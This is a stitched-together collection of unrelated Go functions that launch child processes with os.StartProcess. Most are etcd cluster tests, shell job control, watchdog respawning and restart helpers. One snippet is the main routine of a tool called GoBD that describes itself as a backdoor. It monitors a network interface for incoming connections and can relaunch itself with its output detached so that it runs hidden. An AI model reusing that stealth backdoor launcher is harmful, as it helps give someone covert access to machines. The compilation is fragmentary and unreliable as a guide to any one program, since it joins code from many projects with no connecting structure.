func TestJoinThroughFollower(t *testing.T) { procAttr := new(os.ProcAttr) procAttr.Files = []*os.File{nil, os.Stdout, os.Stderr} _, etcds, err := CreateCluster(2, procAttr, false) if err != nil { t.Fatal("cannot create cluster") } defer DestroyCluster(etcds) time.Sleep(time.Second) newEtcd, err := os.StartProcess(EtcdBinPath, []string{"etcd", "-data-dir=/tmp/node3", "-name=node3", "-addr=127.0.0.1:4003", "-peer-addr=127.0.0.1:7003", "-peers=127.0.0.1:7002", "-f"}, procAttr) if err != nil { t.Fatal("failed starting node3") } defer func() { newEtcd.Kill() newEtcd.Release() }() time.Sleep(time.Second) leader, err := getLeader("http://127.0.0.1:4003") if err != nil { t.Fatal("failed getting leader from node3:", err) } if leader != "http://127.0.0.1:7001" { t.Fatal("expect=http://127.0.0.1:7001 got=", leader) } }
// Ensure that a node can reply to a version check appropriately. func TestVersionCheck(t *testing.T) { procAttr := new(os.ProcAttr) procAttr.Files = []*os.File{nil, os.Stdout, os.Stderr} args := []string{"etcd", "-n=node1", "-f", "-d=/tmp/version_check"} process, err := os.StartProcess(EtcdBinPath, args, procAttr) if err != nil { t.Fatal("start process failed:" + err.Error()) return } defer process.Kill() time.Sleep(time.Second) // Check a version too small. resp, _ := http.Get("http://localhost:7001/version/1/check") resp.Body.Close() if resp.StatusCode != http.StatusForbidden { t.Fatal("Invalid version check: ", resp.StatusCode) } // Check a version too large. resp, _ = http.Get("http://localhost:7001/version/3/check") resp.Body.Close() if resp.StatusCode != http.StatusForbidden { t.Fatal("Invalid version check: ", resp.StatusCode) } // Check a version that's just right. resp, _ = http.Get("http://localhost:7001/version/2/check") resp.Body.Close() if resp.StatusCode != http.StatusOK { t.Fatal("Invalid version check: ", resp.StatusCode) } }
// 处理系统信号 // 监听系统信号,重启或停止服务 func trapSignal(server client.Encoder) { sch := make(chan os.Signal, 10) signal.Notify(sch, syscall.SIGTERM, syscall.SIGKILL, syscall.SIGINT, syscall.SIGHUP, syscall.SIGSTOP, syscall.SIGQUIT) go func(ch <-chan os.Signal) { sig := <-ch server.Shutdown("signal recieved " + sig.String() + ", at: " + time.Now().String()) if sig == syscall.SIGHUP { server.Info("autoencode restart now...") procAttr := new(os.ProcAttr) procAttr.Files = []*os.File{nil, os.Stdout, os.Stderr} procAttr.Dir = os.Getenv("PWD") procAttr.Env = os.Environ() process, err := os.StartProcess(os.Args[0], os.Args, procAttr) if err != nil { server.Info("autoencode restart process failed:" + err.Error()) return } waitMsg, err := process.Wait() if err != nil { server.Info("autoencode restart wait error:" + err.Error()) } server.Info(waitMsg) } else { server.Info("autoencode shutdown now...") } }(sch) }
// Create a five nodes // Kill all the nodes and restart func TestMultiNodeKillAllAndRecovery(t *testing.T) { procAttr := new(os.ProcAttr) procAttr.Files = []*os.File{nil, os.Stdout, os.Stderr} clusterSize := 5 argGroup, etcds, err := CreateCluster(clusterSize, procAttr, false) defer DestroyCluster(etcds) if err != nil { t.Fatal("cannot create cluster") } c := etcd.NewClient(nil) c.SyncCluster() time.Sleep(time.Second) // send 10 commands for i := 0; i < 10; i++ { // Test Set _, err := c.Set("foo", "bar", 0) if err != nil { panic(err) } } time.Sleep(time.Second) // kill all DestroyCluster(etcds) time.Sleep(time.Second) stop := make(chan bool) leaderChan := make(chan string, 1) all := make(chan bool, 1) time.Sleep(time.Second) for i := 0; i < clusterSize; i++ { etcds[i], err = os.StartProcess(EtcdBinPath, argGroup[i], procAttr) } go Monitor(clusterSize, 1, leaderChan, all, stop) <-all <-leaderChan result, err := c.Set("foo", "bar", 0) if err != nil { t.Fatalf("Recovery error: %s", err) } if result.Node.ModifiedIndex != 16 { t.Fatalf("recovery failed! [%d/16]", result.Node.ModifiedIndex) } }
func tryLockAndRun(p params) { // Opening log file file, err := os.OpenFile(p.lockFilename, os.O_CREATE|os.O_RDWR, 0666) if err != nil { log.Fatalf("Unable to write lockfile: %s", p.lockFilename) } // Trying to lock file attempts := 0 for { attempts++ err = syscall.Flock(int(file.Fd()), syscall.LOCK_EX|syscall.LOCK_NB) if err == nil { if p.verbose == true { log.Printf("Locking...") } break } if p.wait == false { fmt.Printf("ERROR: cannot launch %s - run is locked", "TODO") os.Exit(1) } else { if p.verbose { log.Printf("Attempt %d failed - sleeping %d seconds", attempts, p.sleep) } time.Sleep(time.Duration(p.sleep) * time.Second) if attempts >= p.retries { fmt.Printf("ERROR: cannot launch %s - run is locked (after %d attempts", "TODO", attempts) os.Exit(1) } } } if err != nil { log.Fatalf("Locking error: %v", err) } var procAttr os.ProcAttr procAttr.Files = []*os.File{nil, os.Stdout, os.Stderr} command, err4 := exec.LookPath(p.commandInfo[0]) if err4 != nil { command = p.commandInfo[0] } process, err2 := os.StartProcess(command, p.commandInfo, &procAttr) if err2 != nil { fmt.Printf("ERROR: %s\n", err2) } else { _, err3 := process.Wait() if err3 != nil { fmt.Printf("ERROR: %s\n", err3) } } log.Printf("Finish!") }
func restartSecondary(wdPID int) (*os.Process, error) { argv := []string{"./elevApp", strconv.Itoa(1), strconv.Itoa(wdPID)} // 1 = START_SECONDARY attr := new(os.ProcAttr) attr.Files = []*os.File{nil, os.Stdout, os.Stderr} proc, err := os.StartProcess("elevApp", argv, attr) return proc, err }
func restartSecondary(wdPID int) (*os.Process, error) { argv := []string{"./main", strconv.Itoa(1), strconv.Itoa(wdPID)} // 1 = START_SECONDARY attr := new(os.ProcAttr) attr.Files = []*os.File{nil, os.Stdout, os.Stderr} proc, err := os.StartProcess("main", argv, attr) // need struct to keep track of the PIDs return proc, err }
func (s *Session) Open(t int) *Error { if s.IsOpen() { return nil } s.Type = t s.Args = s.BuildTranscodeCommand() log.Printf("Opening transcoder session: %s", s.Args) // create output directory structure if err := s.createOutputDirectories(); err != nil { return ErrorIO } // create pipe pr, pw, err := os.Pipe() if err != nil { s.setState(TC_FAILED) return ErrorTranscodeFailed } s.Pipe = pw // create logfile logname := s.c.Transcode.Log_path + "/" + s.idstr + ".log" s.LogFile, _ = os.OpenFile(logname, os.O_WRONLY|os.O_CREATE|os.O_APPEND, utils.PERM_FILE) // start transcode process var attr os.ProcAttr attr.Dir = s.c.Transcode.Output_path + "/" + s.idstr attr.Files = []*os.File{pr, s.LogFile, s.LogFile} s.Proc, err = os.StartProcess(s.c.Transcode.Command, strings.Fields(s.Args), &attr) if err != nil { log.Printf("Error starting process: %s", err) s.setState(TC_FAILED) pr.Close() pw.Close() s.LogFile.Close() s.Pipe = nil s.Type = 0 s.Args = "" return ErrorTranscodeFailed } // close read-end of pipe and logfile after successful start pr.Close() s.LogFile.Close() // set timeout for session cleanup s.Timer = time.AfterFunc(time.Duration(s.c.Server.Session_timeout)*time.Second, func() { s.HandleTimeout() }) // set state s.setState(TC_RUNNING) return nil }
/* FUNCTION: func main() RETURNS: Nothing ABOUT: The main loop of program execution. Allows for retreiving of flags and intiation of client / server. */ func main() { //flags modePtr := flag.String("mode", "client", "The mode of the application, may either be"+ " client or server. Defaults to client.") ipPtr := flag.String("ip", "127.0.0.1", "The ip to connect to if in client mode.") portPtr := flag.Int("port", 3322, "The port to connect to in client mode, or to listen on in server mode. Defaults to 3322.") interfacePtr := flag.String("iface", "wlan0", "The interface for the backdoor to monitor for incoming connection, defaults to eth0.") lPortPtr := flag.Int("lport", 3321, "The port for the client to listen on.") hiddenPtr := flag.String("visible", "true", "Determines whether the server will be hidden or not. true for visible and false for invisible.") dstMacPtr := flag.String("dMac", "", "Destination mac of the outgoing connection.") //flags flag.Parse() destmac, _ = net.ParseMAC(*dstMacPtr) localip = GetLocalIP() localmac = GetLocalMAC(*interfacePtr) if *hiddenPtr == "false" && *modePtr == "server" { var procAttr os.ProcAttr procAttr.Files = []*os.File{os.Stdin, nil, nil} arguments := make([]string, 7) arguments[0] = "" arguments[1] = fmt.Sprintf("-mode=%s", *modePtr) arguments[2] = fmt.Sprintf("-ip=%s", *ipPtr) arguments[3] = fmt.Sprintf("-port=%d", *portPtr) arguments[4] = fmt.Sprintf("-iface=%s", *interfacePtr) arguments[5] = fmt.Sprintf("-lport=%d", *lPortPtr) arguments[6] = fmt.Sprint("-visible=invalid") if runtime.GOOS == "windows" { _, err := os.StartProcess("GoBD", arguments, &procAttr) checkError(err) } else { _, err := os.StartProcess("./GoBD", arguments, &procAttr) checkError(err) } return } intiateTools() intiateHandles(*interfacePtr) switch *modePtr { case "client": fmt.Printf("Running in client mode. Connecting to %s at port %d.\n", *ipPtr, *portPtr) pType = CLIENT intiateClient(*ipPtr, uint16(*portPtr), uint16(*lPortPtr)) break case "server": fmt.Printf("Running in server mode. Listening on %s at port %d\n", GetLocalIP(), *portPtr) pType = SERVER beginListen(*ipPtr, uint16(*portPtr), uint16(*lPortPtr)) } }
// This test creates a single node and then set a value to it. // Then this test kills the node and restart it and tries to get the value again. func TestSingleNodeRecovery(t *testing.T) { procAttr := new(os.ProcAttr) procAttr.Files = []*os.File{nil, os.Stdout, os.Stderr} args := []string{"etcd", "-name=node1", "-data-dir=/tmp/node1"} process, err := os.StartProcess(EtcdBinPath, append(args, "-f"), procAttr) if err != nil { t.Fatal("start process failed:" + err.Error()) return } time.Sleep(time.Second) c := etcd.NewClient(nil) c.SyncCluster() // Test Set result, err := c.Set("foo", "bar", 100) node := result.Node if err != nil || node.Key != "/foo" || node.Value != "bar" || node.TTL < 95 { if err != nil { t.Fatal(err) } t.Fatalf("Set 1 failed with %s %s %v", node.Key, node.Value, node.TTL) } time.Sleep(time.Second) process.Kill() process, err = os.StartProcess(EtcdBinPath, args, procAttr) defer process.Kill() if err != nil { t.Fatal("start process failed:" + err.Error()) return } time.Sleep(time.Second) result, err = c.Get("foo", false, false) node = result.Node if err != nil { t.Fatal("get fail: " + err.Error()) return } if err != nil || node.Key != "/foo" || node.Value != "bar" || node.TTL > 99 { if err != nil { t.Fatal(err) } t.Fatalf("Recovery Get failed with %s %s %v", node.Key, node.Value, node.TTL) } }
func spawnCopy(wdPID int) (*os.Process, error) { fmt.Println("Spawning copy of Primary") argv := []string{os.Args[0], strconv.Itoa(START_SECONDARY), strconv.Itoa(wdPID)} attr := new(os.ProcAttr) attr.Files = []*os.File{nil, os.Stdout, os.Stderr} proc, err := os.StartProcess("elevApp", argv, attr) return proc, err }
func Command_Update() { if runtime.GOOS == "linux" { args := []string{"arg1"} procAttr := new(os.ProcAttr) procAttr.Files = []*os.File{os.Stdin, os.Stdout, os.Stderr} os.StartProcess("./update_linux.sh", args, procAttr) } else { fmt.Println(utils.Timestamp() + "!update works only in production") } }
func spawnCopy() (*os.Process, error) { if PRINT_INFO { fmt.Println("Spawning copy of ourself") } argv := []string{os.Args[0], strconv.Itoa(SECONDARY), os.Args[2]} attr := new(os.ProcAttr) attr.Files = []*os.File{nil, os.Stdout, os.Stderr} proc, err := os.StartProcess("main", argv, attr) return proc, err }
func Restart() { var attr os.ProcAttr attr.Files = []*os.File{os.Stdin, os.Stdout, os.Stderr} attr.Sys = &syscall.SysProcAttr{} _, err := os.StartProcess(os.Args[0], os.Args, &attr) if err != nil { _err(err) } Stop() }
func execFgCmd(cmd []string, sigStateChanged chan string) { cmdStr := strings.Join(cmd, " ") // TODO: Extract start process into common function. argv0, err := exec.LookPath(cmd[0]) if err != nil { if cmd[0] != "" { fmt.Printf("Unknown command: %s\n", cmd[0]) } // Don't execute new process with empty return. Will cause panic. sigPrompt <- struct{}{} return } var procAttr os.ProcAttr procAttr.Files = []*os.File{os.Stdin, os.Stdout, os.Stderr} p, err := os.StartProcess(argv0, cmd, &procAttr) if err != nil { fmt.Printf("Start process %s, %s failed: %v", err, argv0, cmd) } for { sigChild := make(chan os.Signal) defer close(sigChild) // SIGCONT not receivable: https://github.com/golang/go/issues/8953 // This causes some bugs. Eg. CONT signal not captured by handler means subsequent KILL or STOP signals will be ignored by this handler. signal.Notify(sigChild, syscall.SIGTSTP, syscall.SIGINT, syscall.SIGCONT, syscall.SIGKILL) defer signal.Stop(sigChild) var ws syscall.WaitStatus // Ignoring error. May return "no child processes" error. Eg. Sending Ctrl-c on `cat` command. wpid, _ := syscall.Wait4(p.Pid, &ws, syscall.WUNTRACED, nil) if ws.Exited() { break } if ws.Stopped() { jobHandler(wpid, runningState, cmdStr) jobHandler(wpid, suspendedState, cmdStr) // Return prompt when fg has become bg sigPrompt <- struct{}{} } //if ws.Continued() { // state = contState //} if ws == 9 { jobHandler(wpid, killedState, cmdStr) break } } p.Wait() sigPrompt <- struct{}{} }
func startServerWithDataDir(extra []string) (*os.Process, error) { procAttr := new(os.ProcAttr) procAttr.Files = []*os.File{nil, os.Stdout, os.Stderr} cmd := []string{"etcd", "-data-dir=/tmp/node1", "-name=node1"} cmd = append(cmd, extra...) println(strings.Join(cmd, " ")) return os.StartProcess(EtcdBinPath, cmd, procAttr) }
func spawnWD(priPID int) (*os.Process, error) { fmt.Println("Spawning Watch Dog") argv := []string{"wd", strconv.Itoa(priPID)} attr := new(os.ProcAttr) attr.Files = []*os.File{nil, os.Stdout, os.Stderr} proc, err := os.StartProcess("wd", argv, attr) return proc, err }
// This test creates a single node and then set a value to it. // Then this test kills the node and restart it and tries to get the value again. func TestSingleNodeRecovery(t *testing.T) { procAttr := new(os.ProcAttr) procAttr.Files = []*os.File{nil, os.Stdout, os.Stderr} args := []string{"etcd", "-d=/tmp/node1"} process, err := os.StartProcess("etcd", append(args, "-i"), procAttr) if err != nil { t.Fatal("start process failed:" + err.Error()) return } time.Sleep(time.Second) etcd.SyncCluster() // Test Set result, err := etcd.Set("foo", "bar", 100) if err != nil || result.Key != "/foo" || result.Value != "bar" || result.TTL != 99 { if err != nil { t.Fatal(err) } t.Fatalf("Set 1 failed with %s %s %v", result.Key, result.Value, result.TTL) } time.Sleep(time.Second) process.Kill() process, err = os.StartProcess("etcd", args, procAttr) defer process.Kill() if err != nil { t.Fatal("start process failed:" + err.Error()) return } time.Sleep(time.Second) results, err := etcd.Get("foo") if err != nil { t.Fatal("get fail: " + err.Error()) return } result = results[0] if err != nil || result.Key != "/foo" || result.Value != "bar" || result.TTL > 99 { if err != nil { t.Fatal(err) } t.Fatalf("Recovery Get failed with %s %s %v", result.Key, result.Value, result.TTL) } }
func compileAndStart(targetDir string, appName string) (*os.Process, error) { var procAttr os.ProcAttr procAttr.Files = []*os.File{nil, os.Stdout, os.Stderr} args := []string{"go", "install", targetDir + appName} p, err := os.StartProcess(goDir+"go", args, &procAttr) if err != nil { fmt.Println(err.Error()) return p, err } p, err = os.StartProcess(appBins+appName, nil, &procAttr) return p, err }
// TestSnapshotRestart tests etcd restarts with snapshot file func TestSnapshotRestart(t *testing.T) { procAttr := new(os.ProcAttr) procAttr.Files = []*os.File{nil, os.Stdout, os.Stderr} args := []string{"etcd", "-name=node1", "-data-dir=/tmp/node1", "-snapshot=true", "-snapshot-count=500"} process, err := os.StartProcess(EtcdBinPath, append(args, "-f"), procAttr) if err != nil { t.Fatal("start process failed:" + err.Error()) } time.Sleep(time.Second) c := etcd.NewClient(nil) c.SyncCluster() // issue first 501 commands for i := 0; i < 501; i++ { result, err := c.Set("foo", "bar", 100) node := result.Node if err != nil || node.Key != "/foo" || node.Value != "bar" || node.TTL < 95 { if err != nil { t.Fatal(err) } t.Fatalf("Set failed with %s %s %v", node.Key, node.Value, node.TTL) } } // wait for a snapshot interval time.Sleep(3 * time.Second) _, err = ioutil.ReadDir("/tmp/node1/snapshot") if err != nil { t.Fatal("list snapshot failed:" + err.Error()) } process.Kill() process, err = os.StartProcess(EtcdBinPath, args, procAttr) if err != nil { t.Fatal("start process failed:" + err.Error()) } defer process.Kill() time.Sleep(1 * time.Second) _, err = c.Set("foo", "bar", 100) if err != nil { t.Fatal(err) } }
// This test will kill the current leader and wait for the etcd cluster to elect a new leader for 200 times. // It will print out the election time and the average election time. func TestKillLeader(t *testing.T) { procAttr := new(os.ProcAttr) procAttr.Files = []*os.File{nil, os.Stdout, os.Stderr} clusterSize := 5 argGroup, etcds, err := test.CreateCluster(clusterSize, procAttr, false) if err != nil { t.Fatal("cannot create cluster") } defer test.DestroyCluster(etcds) stop := make(chan bool) leaderChan := make(chan string, 1) all := make(chan bool, 1) time.Sleep(time.Second) go test.Monitor(clusterSize, 1, leaderChan, all, stop) var totalTime time.Duration leader := "http://127.0.0.1:7001" for i := 0; i < clusterSize; i++ { fmt.Println("leader is ", leader) port, _ := strconv.Atoi(strings.Split(leader, ":")[2]) num := port - 7001 fmt.Println("kill server ", num) etcds[num].Kill() etcds[num].Release() start := time.Now() for { newLeader := <-leaderChan if newLeader != leader { leader = newLeader break } } take := time.Now().Sub(start) totalTime += take avgTime := totalTime / (time.Duration)(i+1) fmt.Println("Leader election time is ", take, "with election timeout", ElectionTimeout) fmt.Println("Leader election time average is", avgTime, "with election timeout", ElectionTimeout) etcds[num], err = os.StartProcess("etcd", argGroup[num], procAttr) } stop <- true }
func execBgCmd(cmd []string, sigStateChanged chan string) { cmdStr := strings.Join(cmd, " ") argv0, err := exec.LookPath(cmd[0]) if err != nil { if cmd[0] != "" { fmt.Printf("Unknown command: %s\n", cmd[0]) } sigPrompt <- struct{}{} return } var procAttr os.ProcAttr procAttr.Files = []*os.File{os.Stdin, os.Stdout, os.Stderr} p, err := os.StartProcess(argv0, cmd, &procAttr) if err != nil { fmt.Printf("Start process %s, %s failed: %v", err, argv0, cmd) } jobHandler(p.Pid, runningState, cmdStr) sigPrompt <- struct{}{} //FIXME: Bg processes should not receive keyboard signals sent to fg process. for { sigChild := make(chan os.Signal) defer close(sigChild) signal.Notify(sigChild, syscall.SIGCHLD) defer signal.Stop(sigChild) var ws syscall.WaitStatus wpid, _ := syscall.Wait4(p.Pid, &ws, syscall.WUNTRACED, nil) if ws.Exited() { jobHandler(wpid, doneState, cmdStr) break } if ws.Stopped() { jobHandler(wpid, suspendedState, cmdStr) sigPrompt <- struct{}{} } //if ws.Continued() { // state = contState //} if ws == 9 { jobHandler(wpid, killedState, cmdStr) break } } p.Wait() sigPrompt <- struct{}{} }
func createPlayer(Id int, rparams *RenderParams) NodeResp { if rparams.Width <= 0 { return NodeResp{false, "width must be positive"} } if rparams.Height <= 0 { return NodeResp{false, "height must be positive"} } x3dfolder, err := unzipfile(rparams.X3dfile) if err != nil { return NodeResp{false, "unzip failed:" + err.Error()} } localx3dfile := x3dfolder + "/*.x3d" matches, err := filepath.Glob(localx3dfile) if err != nil { return NodeResp{false, "x3d in zip failed:" + err.Error()} } //we have the ports rconf := &RenderConf{rparams, 8000 + Id, 8100 + Id, x3dfolder} //build up command sargs := []string{ "progname", "-width", strconv.Itoa(rparams.Width), "-height", strconv.Itoa(rparams.Height), "-streamport", strconv.Itoa(rconf.Sport), "-listenerport", strconv.Itoa(rconf.Lport), "-x3dfile", matches[0]} fmt.Println(sargs) procAttr := new(os.ProcAttr) procAttr.Files = []*os.File{nil, os.Stdout, os.Stderr} p, err := os.StartProcess("c:\\langs\\ipromotion\\promorenderer\\promorenderer.exe", sargs, procAttr) if err != nil { return NodeResp{false, "start process failed:" + err.Error()} } fmt.Println("Process " + string(p.Pid) + " created") fmt.Println("started") streamlut[Id] = &PlayerConf{rconf, p, time.Now()} return NodeResp{true, strconv.Itoa(Id)} }
func (e *Environment) Spawn(cmd []string, extraVars map[string]string) (*int, error) { if len(cmd) == 0 { return nil, ErrInvalidCommand } // lookup the path of the executable cmdpath, err := exec.LookPath(cmd[0]) if err != nil { return nil, fmt.Errorf("Cannot find executable %s: %v", cmd[0], err) } // copy the extra vars so we can mutate it vars := make(map[string]string) for key, value := range extraVars { vars[key] = value } // start the agent sock, err := e.startProxyKeyring() if err != nil { return nil, err } vars["SSH_AUTH_SOCK"] = sock // start the process var attr os.ProcAttr attr.Env = e.buildEnviron(vars) attr.Files = []*os.File{os.Stdin, os.Stdout, os.Stderr} proc, err := os.StartProcess(cmdpath, cmd, &attr) if err != nil { return nil, fmt.Errorf("Failed to execute command: %v", err) } // wait for the process to exit state, _ := proc.Wait() var exitStatus int if !state.Success() { if status, ok := state.Sys().(syscall.WaitStatus); ok { exitStatus = status.ExitStatus() } else { exitStatus = 255 } } // we only return an error if spawning the process failed, not if // the spawned command returned a failure status code. return &exitStatus, nil }
// Create a five-node cluster // Replace one of the nodes with different peer address func TestReplaceWithDifferentPeerAddress(t *testing.T) { // TODO(yichengq): find some way to avoid the error that will be // caused if some node joins the cluster with the collided name. // Possible solutions: // 1. Remove itself when executing a join command with the same name // and different peer address. However, it should find some way to // trigger that execution because the leader may update its address // and stop heartbeat. // 2. Remove the node with the same name before join each time. // But this way could be rather overkill. t.Skip("Unimplemented functionality") procAttr := new(os.ProcAttr) procAttr.Files = []*os.File{nil, os.Stdout, os.Stderr} clusterSize := 5 argGroup, etcds, err := CreateCluster(clusterSize, procAttr, false) if err != nil { t.Fatal("cannot create cluster") } defer DestroyCluster(etcds) time.Sleep(2 * time.Second) rand.Int() for i := 0; i < 10; i++ { num := rand.Int() % clusterSize fmt.Println("replace node", num+1) argGroup[num] = increasePeerAddressPort(argGroup[num], clusterSize) argGroup[num] = increaseAddressPort(argGroup[num], clusterSize) argGroup[num] = increaseDataDir(argGroup[num], clusterSize) // restart newEtcd, err := os.StartProcess(EtcdBinPath, append(argGroup[num], "-f"), procAttr) if err != nil { panic(err) } etcds[num].Wait() etcds[num] = newEtcd } c := etcd.NewClient(nil) c.SyncCluster() result, err := c.Set("foo", "bar", 0) if err != nil || result.Node.Key != "/foo" || result.Node.Value != "bar" { t.Fatal("Failed to set value in etcd cluster") } }
func execute(cmd string, args []string, slen int) { var procattr os.ProcAttr procattr.Files = []*os.File{os.Stdin, os.Stdout, os.Stderr} if path != "" { cmd = path + cmd } proc, err := os.StartProcess(cmd, args, &procattr) if err != nil { fmt.Println(err) return } proc.Wait() return }
// Ensure that we can start a v2 cluster from the logs of a v1 cluster. func TestV1ClusterMigration(t *testing.T) { path, _ := ioutil.TempDir("", "etcd-") os.RemoveAll(path) defer os.RemoveAll(path) nodes := []string{"node0", "node2"} for i, node := range nodes { nodepath := filepath.Join(path, node) fixturepath, _ := filepath.Abs(filepath.Join("../fixtures/v1.cluster/", node)) fmt.Println("FIXPATH =", fixturepath) fmt.Println("NODEPATH =", nodepath) os.MkdirAll(filepath.Dir(nodepath), 0777) // Copy over fixture files. c := exec.Command("cp", "-rf", fixturepath, nodepath) if out, err := c.CombinedOutput(); err != nil { fmt.Println(">>>>>>\n", string(out), "<<<<<<") panic("Fixture initialization error:" + err.Error()) } procAttr := new(os.ProcAttr) procAttr.Files = []*os.File{nil, os.Stdout, os.Stderr} args := []string{"etcd", fmt.Sprintf("-data-dir=%s", nodepath)} args = append(args, "-addr", fmt.Sprintf("127.0.0.1:%d", 4001+i)) args = append(args, "-peer-addr", fmt.Sprintf("127.0.0.1:%d", 7001+i)) args = append(args, "-name", node) process, err := os.StartProcess(EtcdBinPath, args, procAttr) if err != nil { t.Fatal("start process failed:" + err.Error()) return } defer process.Kill() time.Sleep(time.Second) } // Ensure deleted message is removed. resp, err := tests.Get("http://localhost:4001/v2/keys/message") body := tests.ReadBody(resp) assert.Nil(t, err, "") assert.Equal(t, resp.StatusCode, http.StatusNotFound) assert.Equal(t, string(body), `{"errorCode":100,"message":"Key not found","cause":"/message","index":11}`+"\n") // Ensure TTL'd message is removed. resp, err = tests.Get("http://localhost:4001/v2/keys/foo") body = tests.ReadBody(resp) assert.Nil(t, err, "") assert.Equal(t, resp.StatusCode, 200, "") assert.Equal(t, string(body), `{"action":"get","node":{"key":"/foo","value":"one","modifiedIndex":9,"createdIndex":9}}`) }
// Ensure that etcd does not come up if the internal raft versions do not match. func TestInternalVersion(t *testing.T) { var mu sync.Mutex checkedVersion := false testMux := http.NewServeMux() testMux.HandleFunc("/version", func(w http.ResponseWriter, r *http.Request) { fmt.Fprintln(w, "This is not a version number") mu.Lock() defer mu.Unlock() checkedVersion = true }) testMux.HandleFunc("/join", func(w http.ResponseWriter, r *http.Request) { t.Fatal("should not attempt to join!") }) ts := httptest.NewServer(testMux) defer ts.Close() fakeURL, _ := url.Parse(ts.URL) procAttr := new(os.ProcAttr) procAttr.Files = []*os.File{nil, os.Stdout, os.Stderr} args := []string{"etcd", "-name=node1", "-f", "-data-dir=/tmp/node1", "-peers=" + fakeURL.Host} process, err := os.StartProcess(EtcdBinPath, args, procAttr) if err != nil { t.Fatal("start process failed:" + err.Error()) return } time.Sleep(time.Second) process.Kill() _, err = http.Get("http://127.0.0.1:4001") if err == nil { t.Fatal("etcd node should not be up") return } mu.Lock() defer mu.Unlock() if checkedVersion == false { t.Fatal("etcd did not check the version") return } }
// This test will kill the current leader and wait for the etcd cluster to elect a new leader for 200 times. // It will print out the election time and the average election time. func TestKillLeader(t *testing.T) { procAttr := new(os.ProcAttr) procAttr.Files = []*os.File{nil, os.Stdout, os.Stderr} clusterSize := 5 argGroup, etcds, err := createCluster(clusterSize, procAttr) if err != nil { t.Fatal("cannot create cluster") } defer destroyCluster(etcds) leaderChan := make(chan string, 1) time.Sleep(time.Second) go leaderMonitor(clusterSize, 1, leaderChan) var totalTime time.Duration leader := "0.0.0.0:7001" for i := 0; i < 200; i++ { port, _ := strconv.Atoi(strings.Split(leader, ":")[1]) num := port - 7001 fmt.Println("kill server ", num) etcds[num].Kill() etcds[num].Release() start := time.Now() for { newLeader := <-leaderChan if newLeader != leader { leader = newLeader break } } take := time.Now().Sub(start) totalTime += take avgTime := totalTime / (time.Duration)(i+1) fmt.Println("Leader election time is ", take, "with election timeout", ELECTIONTIMTOUT) fmt.Println("Leader election time average is", avgTime, "with election timeout", ELECTIONTIMTOUT) etcds[num], err = os.StartProcess("etcd", argGroup[num], procAttr) } }
func RunHydraInStandaloneAndReturnProcess(args []string) *os.Process { procAttr := new(os.ProcAttr) procAttr.Files = []*os.File{nil, os.Stdout, os.Stderr} dataDirExits, err := existsPath(DATA_DIR_PATH) if err == nil && dataDirExits { os.RemoveAll(DATA_DIR_PATH) } args = append([]string{"hydra", "-f"}, args...) process, err := os.StartProcess(HydraBinPath, args, procAttr) if err != nil { panic("start process failed:" + err.Error()) } return process }